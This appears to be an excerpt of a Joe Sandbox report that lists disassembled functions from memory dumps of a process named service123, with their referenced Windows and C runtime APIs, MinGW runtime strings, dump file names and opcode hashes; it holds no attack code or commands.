Opcode ID: 64be7ec9188098c04fd693962aeb79b1a98048747cdcdecdabcf65b3643d1b9d
Instruction ID: 05d8328808644a39ea5694adfcba9cf712baa6f5401886bd04fc2ffd44ecbcbd
Opcode Fuzzy Hash: 64be7ec9188098c04fd693962aeb79b1a98048747cdcdecdabcf65b3643d1b9d
Instruction Fuzzy Hash: E6516C70609B428FCB04EF69C58465AB7F5BB8A304F16D52CD949A7B11EB30F846CB92

Function 001C1940 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 001C196F
vfprintf.MSVCRT ref: 001C198F
abort.MSVCRT ref: 001C1994
VirtualQuery.KERNEL32 ref: 001C1A2B

Strings

VirtualProtect failed with code 0x%x, xrefs: 001C1AA6
VirtualQuery failed for %d bytes at address %p, xrefs: 001C1AD7
Mingw-w64 runtime failure:, xrefs: 001C1968
Address %p has no image-section, xrefs: 001C1AEB

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: f0ee4c715db3bd37b17988614b16e1dd0414be47a4312361dc43282814960270
Instruction ID: d6a3d935683e979c5ab6fe3feb406a1a517a4f44f3af434d89330ab1ff7762cc
Opcode Fuzzy Hash: f0ee4c715db3bd37b17988614b16e1dd0414be47a4312361dc43282814960270
Instruction Fuzzy Hash: 74519BB1508300DFC700EF69E985B5AFBE0FFA5354F46892DE8899B212D734E855CB92

Function 6C9CA690 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 129fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 6C9CA6BF
vfprintf.MSVCRT ref: 6C9CA6DF
abort.MSVCRT ref: 6C9CA6E4
VirtualQuery.KERNEL32 ref: 6C9CA77B

Strings

Mingw-w64 runtime failure:, xrefs: 6C9CA6B8
Address %p has no image-section, xrefs: 6C9CA83B
VirtualProtect failed with code 0x%x, xrefs: 6C9CA7F6
VirtualQuery failed for %d bytes at address %p, xrefs: 6C9CA827

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: QueryVirtualabortfwritevfprintf
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 2513968241-1534286854
Opcode ID: 16c8b8668023d93b0fc3a8c8fbf97124778c9694376b76727f005d05985213e6
Instruction ID: 43c5949d6bc455e86499c9af5bfe17d05dcf9d5dc485a89ff6bcb98e18a06847
Opcode Fuzzy Hash: 16c8b8668023d93b0fc3a8c8fbf97124778c9694376b76727f005d05985213e6
Instruction Fuzzy Hash: EA515AB1A057019FC710EF29C58565ABBF4BF98318F51C91CE8889B651DB34E84ACB93

Function 6C9CE0A0 Relevance: 16.6, APIs: 11, Instructions: 98COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D4C
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: a57810ef2c692778b6fd5d8f0ba1bef342823acaa8c443fcbf8aa4ec74bf1681
Instruction ID: e8eb526fd30a87be10af1818580ee218f1504d62d55109c0388cb4bf3b63c79d
Opcode Fuzzy Hash: a57810ef2c692778b6fd5d8f0ba1bef342823acaa8c443fcbf8aa4ec74bf1681
Instruction Fuzzy Hash: 702123323492198FD704CE58D88269673A6EBC232872881BEE4498BB55D637E916C7D2

Function 6C9CE570 Relevance: 15.1, APIs: 10, Instructions: 145COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction ID: 77a1e7fcaca8669eb22e5f47e49ffb5a6e9eff11a0c418e8f3f818302bac9538
Opcode Fuzzy Hash: 9dd2c658d3c2cb619c7bf21bb267980a7d57e1b10d09043a9d0bcde5e8cf3aa6
Instruction Fuzzy Hash: 254126707187068BD710DF28C04276AB7E5AF95318F504E19E4B687A95E334DA4ECBD3

Function 6C9CE59B Relevance: 15.1, APIs: 10, Instructions: 89COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction ID: 907983b2479bf59b68580fc794fee2fe8a12472b7ffac186b91907340f5fd621
Opcode Fuzzy Hash: 602950868eee7070e08be62886ca486b6e553905e997eb949550a7b66955e2bd
Instruction Fuzzy Hash: 6D2138707057028BDB10DF28C18236AB7E9AF55318F604E09E4B687E85E334D94ACBD3

Function 6C9CE714 Relevance: 15.0, APIs: 10, Instructions: 35COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D51
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D56
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D5B
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D60
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D65
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6A
abort.MSVCRT(?,?,?,?,?,?,6C9CE2F4,?,?,?,?,?,?,00000000,00000001,6C9D008D), ref: 6CA96D6F
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D74
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D79
abort.MSVCRT(?,?,00000000,00000000,?,771AE010,6C9D038F), ref: 6CA96D7E

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction ID: 52bc82cb50c5cc37fdc6bcdb9746fa710207d20280aeb35d9c212d9e3a48bfd6
Opcode Fuzzy Hash: 9e089e6cd6cd64aa5b62a2a55d0ff6e4215562d1fbf434e16bed1c0db5fcfaf7
Instruction Fuzzy Hash: 0DE026302886198BCB10CE28C0631A5B7D89F6634CB414806C4D393E14D330DA4BCAC7

Function 6C9D9249 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 6C9D9260
GetProcAddress.KERNEL32 ref: 6C9D927A
LoadLibraryW.KERNEL32 ref: 6C9D929F
GetProcAddress.KERNEL32 ref: 6C9D92B3

Strings

advapi32.dll, xrefs: 6C9D9298
msvcrt.dll, xrefs: 6C9D9255
SystemFunction036, xrefs: 6C9D92A8
rand_s, xrefs: 6C9D926F

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 8b07e0882d76a9896286a78624865a54151b030597133a09c1f98aaf63b692f5
Instruction ID: d1b741f35938596ff935ba7a11526856e9614ed9555e94c37eca162e293e29ea
Opcode Fuzzy Hash: 8b07e0882d76a9896286a78624865a54151b030597133a09c1f98aaf63b692f5
Instruction Fuzzy Hash: D9F04FB19543418BDF00BFBC864624ABBB0BB09320F02892CE4C5A7300DB30E466CBA7

Function 6CA5F8C0 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA3DA2E), ref: 6CA5F95D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA3DA2E), ref: 6CA5F988
memmove.MSVCRT ref: 6CA5F9D7
memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA3DA2E), ref: 6CA5FA0D
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000,?,?,6CA3DA2E), ref: 6CA5FA58

Strings

basic_string::_M_replace, xrefs: 6CA5FBB6

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: c4efe0a0c2de49c012291bd31da5b9ad2b2531dbf7cae3c50d43b0756f555e31
Instruction ID: 723a67fb3c90350ac1f5c03e620ac78abc68eeee189effb1a6cd3f1976a260d2
Opcode Fuzzy Hash: c4efe0a0c2de49c012291bd31da5b9ad2b2531dbf7cae3c50d43b0756f555e31
Instruction Fuzzy Hash: F48152B5A09741DFC300DF2CC99051EBBE1AFCA244F69885EE4D597725D232E898CB92

Function 6C9CFEE0 Relevance: 13.7, APIs: 9, Instructions: 186synchronizationCOMMON

Download Yara Rule

APIs

CreateSemaphoreW.KERNEL32 ref: 6C9D00D2
WaitForSingleObject.KERNEL32 ref: 6C9D0117

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: 77aec4c545f061f0245852b3fa76a971948de719b7845b3049d71114068def40
Instruction ID: b1289e9cf040c7129cf7feeffa396f96026e5e8458ed8a14e6cfcc2ebe4e5897
Opcode Fuzzy Hash: 77aec4c545f061f0245852b3fa76a971948de719b7845b3049d71114068def40
Instruction Fuzzy Hash: 6361A770709706CFDB14EF69C58035ABBF8EB4A308F11C529E81997A40DB70E95ACB93

Function 6C9CE760 Relevance: 13.6, APIs: 9, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction ID: 40705e37bb4132e1b2b23caae7b985a255b5d920badfd7ac1cf2e7c0e13a18a1
Opcode Fuzzy Hash: 06e0c648a8d817803f94ec4fed503a03ca8cf05461f9862a5274ef0ffe4ad900
Instruction Fuzzy Hash: D201E175B082198FC700CA18C482A9AF7E9AB95718F014D29F88687B14D234E8DAC7C3

Function 001C2BF0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 001C2CC1

Strings

0, xrefs: 001C313E
o, xrefs: 001C30A8

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction ID: efbba075ad3d4c7f80b8da1dccec9288532301f9bf307cb4e8fc82880ed1d3b7
Opcode Fuzzy Hash: 5a2ef28bdbcba101e83cdabdda6d05f5f0490c8583f277cf0ba504eb215e70c5
Instruction Fuzzy Hash: E1F15F72A042098FCB15CF68C490B9DBBF2BFA9360F19C22DE855AB355D734E945CB90

Function 6C9D32C0 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 407COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C9D3391

Strings

0, xrefs: 6C9D380E
o, xrefs: 6C9D3778

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: memset
String ID: 0$o
API String ID: 2221118986-4157579757
Opcode ID: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction ID: c348a16e68f01f201aef6553c93cb36b9d0513511fa42797860aaf33b156f2ec
Opcode Fuzzy Hash: 00cb2d98c6e32ca29e5df2379417918a183b51e8976e900d5a5783c2af379635
Instruction Fuzzy Hash: 4AF19F71A04A098FCB00CF78C48069DBBF6BF89365F5AC269D858BBB41D734E945CB90

Function 001C14E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 001C14F0
LoadLibraryA.KERNEL32 ref: 001C1506
GetProcAddress.KERNEL32 ref: 001C1525
GetProcAddress.KERNEL32 ref: 001C1537

Strings

__deregister_frame_info, xrefs: 001C152C
libgcc_s_dw2-1.dll, xrefs: 001C14E9, 001C14FF
__register_frame_info, xrefs: 001C151A

Memory Dump Source

Source File: 0000000F.00000002.4317963896.00000000001C1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 001C0000, based on PE: true

Associated: 0000000F.00000002.4317867359.00000000001C0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318055955.00000000001CA000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318171900.00000000001CE000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 0000000F.00000002.4318267182.00000000001D1000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_1c0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: 919b48b29c211f0f7aba85625a75332e1261da11fb1d52651355c65559e38173
Instruction ID: f982a60ab190ff2b3b9620f0d87c98c829a63169183c38aa2887dd53b3b8ce5b
Opcode Fuzzy Hash: 919b48b29c211f0f7aba85625a75332e1261da11fb1d52651355c65559e38173
Instruction Fuzzy Hash: EB0171B18492049BC3007F78AA49B1DBFF4AF56754F45452DE58997201E770C4648B93

Function 6C9C13E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 6C9C13F0
LoadLibraryA.KERNEL32 ref: 6C9C1406
GetProcAddress.KERNEL32 ref: 6C9C1425
GetProcAddress.KERNEL32 ref: 6C9C1437

Strings

__deregister_frame_info, xrefs: 6C9C142C
__register_frame_info, xrefs: 6C9C141A
libgcc_s_dw2-1.dll, xrefs: 6C9C13E9, 6C9C13FF

Memory Dump Source

Source File: 0000000F.00000002.4319270611.000000006C9C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 6C9C0000, based on PE: true

Associated: 0000000F.00000002.4319199254.000000006C9C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319632260.000000006CA9D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319702536.000000006CA9F000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319858627.000000006CAE8000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319916833.000000006CAE9000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000000F.00000002.4319973200.000000006CAEC000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_6c9c0000_service123.jbxd

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: __deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll
API String ID: 384173800-1835852900
Opcode ID: a0b4e3409f18acb2bf16b588b046f87423799c8696b8b78cc59300983037bae1
Instruction ID: ff4195cbfe55ca3438aabb08b7602c59541f82c586fe661a0c1e407e3d9e81c6
Opcode Fuzzy Hash: a0b4e3409f18acb2bf16b588b046f87423799c8696b8b78cc59300983037bae1
Instruction Fuzzy Hash: 3301D4B2B153018BCB00BF7C9A0725D7FF8AA46254F01842DD48987A10E730C455DBE7

Function 6C9E73C0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 6C9E7411
strlen.MSVCRT ref: 6C9E742B
strlen.MSVCRT ref: 6C9E747B
strlen.MSVCRT ref: 6C9E74D8
